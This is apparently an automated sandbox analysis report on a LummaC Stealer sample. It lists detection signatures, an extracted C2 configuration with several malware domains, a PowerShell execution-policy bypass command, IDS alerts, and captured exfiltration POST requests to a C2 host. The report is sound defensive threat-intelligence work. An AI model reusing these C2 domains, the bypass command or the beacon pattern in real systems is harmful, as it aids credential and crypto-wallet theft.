Create Interactive Tour

Windows Analysis Report
#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe

Overview

General Information

Sample name:#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe
renamed because original name is a hash value
Original sample name:.exe
Analysis ID:1601484
MD5:f86c1fb3a2c034c4d3d44a96fd9d6093
SHA1:eb478a69bc15b156a9ea0f0276e72788426b5b9e
SHA256:10216641566ad9478b8aa7af136ee17959c8a4597b663ae379647f437f91f220
Tags:exeLummaStealeruser-aachum
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Found many strings related to Crypto-Wallets (likely being stolen)
Joe Sandbox ML detected suspicious sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe (PID: 7412 cmdline: "C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe" MD5: F86C1FB3A2C034C4D3D44A96FD9D6093)
    • powershell.exe (PID: 8004 cmdline: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\MVYET7Q4Z4FMOQW2PUNL.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 8012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
{
  "C2 url": [
    "abaft-taboo.bond",
    "noxiuos-utopi.bond",
    "moonehobno.bond",
    "rainy-lamep.bond",
    "elfinyamen.bond",
    "cowertbabei.bond",
    "learnyprocce.bond",
    "conquemappe.bond",
    "traveladdicts.top"
  ],
  "Build id": "MeHdy4--pl2yan1"
}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000000.00000002.2476446512.0000000002460000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
      • 0x5311c:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
      • 0x566b2:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
      00000000.00000003.2276511844.0000000000737000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe PID: 7412JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
          Process Memory Space: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe PID: 7412JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Process Memory Space: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe PID: 7412JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security

              System Summary

              barindex
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\MVYET7Q4Z4FMOQW2PUNL.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\MVYET7Q4Z4FMOQW2PUNL.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe", ParentImage: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, ParentProcessId: 7412, ParentProcessName: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\MVYET7Q4Z4FMOQW2PUNL.ps1", ProcessId: 8004, ProcessName: powershell.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\MVYET7Q4Z4FMOQW2PUNL.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\MVYET7Q4Z4FMOQW2PUNL.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe", ParentImage: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, ParentProcessId: 7412, ParentProcessName: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\MVYET7Q4Z4FMOQW2PUNL.ps1", ProcessId: 8004, ProcessName: powershell.exe
              Source: Process startedAuthor: frack113: Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\MVYET7Q4Z4FMOQW2PUNL.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\MVYET7Q4Z4FMOQW2PUNL.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe", ParentImage: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, ParentProcessId: 7412, ParentProcessName: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\MVYET7Q4Z4FMOQW2PUNL.ps1", ProcessId: 8004, ProcessName: powershell.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\MVYET7Q4Z4FMOQW2PUNL.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\MVYET7Q4Z4FMOQW2PUNL.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe", ParentImage: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, ParentProcessId: 7412, ParentProcessName: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\MVYET7Q4Z4FMOQW2PUNL.ps1", ProcessId: 8004, ProcessName: powershell.exe
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-28T16:15:57.972873+010020283713Unknown Traffic192.168.2.449734104.21.60.241443TCP
              2025-01-28T16:15:59.294730+010020283713Unknown Traffic192.168.2.449736104.21.60.241443TCP
              2025-01-28T16:16:01.039050+010020283713Unknown Traffic192.168.2.449738104.21.60.241443TCP
              2025-01-28T16:16:13.829900+010020283713Unknown Traffic192.168.2.449743104.21.60.241443TCP
              2025-01-28T16:16:26.672332+010020283713Unknown Traffic192.168.2.449744104.21.60.241443TCP
              2025-01-28T16:16:40.165943+010020283713Unknown Traffic192.168.2.449752104.21.60.241443TCP
              2025-01-28T16:16:43.058158+010020283713Unknown Traffic192.168.2.449773104.21.60.241443TCP
              2025-01-28T16:16:57.101132+010020283713Unknown Traffic192.168.2.449859104.21.60.241443TCP
              2025-01-28T16:16:58.057907+010020283713Unknown Traffic192.168.2.449865104.26.3.16443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-28T16:15:58.771885+010020546531A Network Trojan was detected192.168.2.449734104.21.60.241443TCP
              2025-01-28T16:15:59.782405+010020546531A Network Trojan was detected192.168.2.449736104.21.60.241443TCP
              2025-01-28T16:16:57.561213+010020546531A Network Trojan was detected192.168.2.449859104.21.60.241443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-28T16:15:58.771885+010020498361A Network Trojan was detected192.168.2.449734104.21.60.241443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-28T16:15:59.782405+010020498121A Network Trojan was detected192.168.2.449736104.21.60.241443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-28T16:16:40.931548+010020480941Malware Command and Control Activity Detected192.168.2.449752104.21.60.241443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-28T16:16:43.064017+010028438641A Network Trojan was detected192.168.2.449773104.21.60.241443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: moonehobno.bondAvira URL Cloud: Label: malware
              Source: learnyprocce.bondAvira URL Cloud: Label: malware
              Source: rainy-lamep.bondAvira URL Cloud: Label: malware
              Source: noxiuos-utopi.bondAvira URL Cloud: Label: malware
              Source: abaft-taboo.bondAvira URL Cloud: Label: malware
              Source: cowertbabei.bondAvira URL Cloud: Label: malware
              Source: conquemappe.bondAvira URL Cloud: Label: malware
              Source: elfinyamen.bondAvira URL Cloud: Label: malware
              Source: 00000000.00000002.2476446512.0000000002460000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["abaft-taboo.bond", "noxiuos-utopi.bond", "moonehobno.bond", "rainy-lamep.bond", "elfinyamen.bond", "cowertbabei.bond", "learnyprocce.bond", "conquemappe.bond", "traveladdicts.top"], "Build id": "MeHdy4--pl2yan1"}
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.6% probability
              Source: 00000000.00000002.2476446512.0000000002460000.00000040.00001000.00020000.00000000.sdmpString decryptor: abaft-taboo.bond
              Source: 00000000.00000002.2476446512.0000000002460000.00000040.00001000.00020000.00000000.sdmpString decryptor: noxiuos-utopi.bond
              Source: 00000000.00000002.2476446512.0000000002460000.00000040.00001000.00020000.00000000.sdmpString decryptor: moonehobno.bond
              Source: 00000000.00000002.2476446512.0000000002460000.00000040.00001000.00020000.00000000.sdmpString decryptor: rainy-lamep.bond
              Source: 00000000.00000002.2476446512.0000000002460000.00000040.00001000.00020000.00000000.sdmpString decryptor: elfinyamen.bond
              Source: 00000000.00000002.2476446512.0000000002460000.00000040.00001000.00020000.00000000.sdmpString decryptor: cowertbabei.bond
              Source: 00000000.00000002.2476446512.0000000002460000.00000040.00001000.00020000.00000000.sdmpString decryptor: learnyprocce.bond
              Source: 00000000.00000002.2476446512.0000000002460000.00000040.00001000.00020000.00000000.sdmpString decryptor: conquemappe.bond
              Source: 00000000.00000002.2476446512.0000000002460000.00000040.00001000.00020000.00000000.sdmpString decryptor: traveladdicts.top
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: unknownHTTPS traffic detected: 104.21.60.241:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.60.241:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.60.241:443 -> 192.168.2.4:49738 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.60.241:443 -> 192.168.2.4:49743 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.60.241:443 -> 192.168.2.4:49744 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.60.241:443 -> 192.168.2.4:49752 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.60.241:443 -> 192.168.2.4:49773 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.60.241:443 -> 192.168.2.4:49859 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.26.3.16:443 -> 192.168.2.4:49865 version: TLS 1.2

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49734 -> 104.21.60.241:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49734 -> 104.21.60.241:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49752 -> 104.21.60.241:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49736 -> 104.21.60.241:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49736 -> 104.21.60.241:443
              Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49773 -> 104.21.60.241:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49859 -> 104.21.60.241:443
              Source: Malware configuration extractorURLs: abaft-taboo.bond
              Source: Malware configuration extractorURLs: noxiuos-utopi.bond
              Source: Malware configuration extractorURLs: moonehobno.bond
              Source: Malware configuration extractorURLs: rainy-lamep.bond
              Source: Malware configuration extractorURLs: elfinyamen.bond
              Source: Malware configuration extractorURLs: cowertbabei.bond
              Source: Malware configuration extractorURLs: learnyprocce.bond
              Source: Malware configuration extractorURLs: conquemappe.bond
              Source: Malware configuration extractorURLs: traveladdicts.top
              Source: unknownDNS query: name: rentry.co
              Source: Joe Sandbox ViewIP Address: 104.26.3.16 104.26.3.16
              Source: Joe Sandbox ViewIP Address: 104.21.60.241 104.21.60.241
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 104.21.60.241:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 104.21.60.241:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 104.21.60.241:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 104.21.60.241:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 104.21.60.241:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49752 -> 104.21.60.241:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49773 -> 104.21.60.241:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49865 -> 104.26.3.16:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49859 -> 104.21.60.241:443
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: traveladdicts.top
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 49Host: traveladdicts.top
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=XCBEHHM26E12S5CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18147Host: traveladdicts.top
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=FB3100XCJPKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8744Host: traveladdicts.top
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2049G0Z2PZWMTUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20409Host: traveladdicts.top
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=JZ1454JTUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2541Host: traveladdicts.top
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=QQWH8VW3RCPOZ95User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 574203Host: traveladdicts.top
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 84Host: traveladdicts.top
              Source: global trafficHTTP traffic detected: GET /feouewe5/raw HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: rentry.co
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /feouewe5/raw HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: rentry.co
              Source: global trafficDNS traffic detected: DNS query: traveladdicts.top
              Source: global trafficDNS traffic detected: DNS query: rentry.co
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: traveladdicts.top
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 28 Jan 2025 15:16:58 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Originvary: accept-encodingx-xss-protection: 1; mode=blockstrict-transport-security: max-age=31536000; includeSubDomainscf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3Nl%2FOiUN2xBWBqiUNgSb5PT7VUdwXry3loUljxHyWscxM0Yzf2lafKKpUcYhRkA46s5qZCT799YYEFDaANaf7vlHpO7Z8AN3WqquBHRbUoAnR5s3z94LCCKZFA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9091f2576b0b0f9f-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1683&min_rtt=1682&rtt_var=633&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2817&recv_bytes=810&delivery_rate=1724748&cwnd=220&unsent_bytes=0&cid=349f066075c46494&ts=317&x=0"
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2144754640.0000000003780000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2144754640.0000000003780000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1873015266.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000002.2473405041.0000000000719000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2276511844.0000000000719000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2477826670.0000000000875000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1873015266.00000000006ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2276511844.0000000000719000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft.
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2144754640.0000000003780000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2144754640.0000000003780000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2144754640.0000000003780000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2144754640.0000000003780000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2144754640.0000000003780000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeString found in binary or memory: http://ocsp.comodoca.com0
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2144754640.0000000003780000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2144754640.0000000003780000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeString found in binary or memory: http://ocsp.sectigo.com0
              Source: powershell.exe, 00000004.00000002.2480645091.00000000047E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
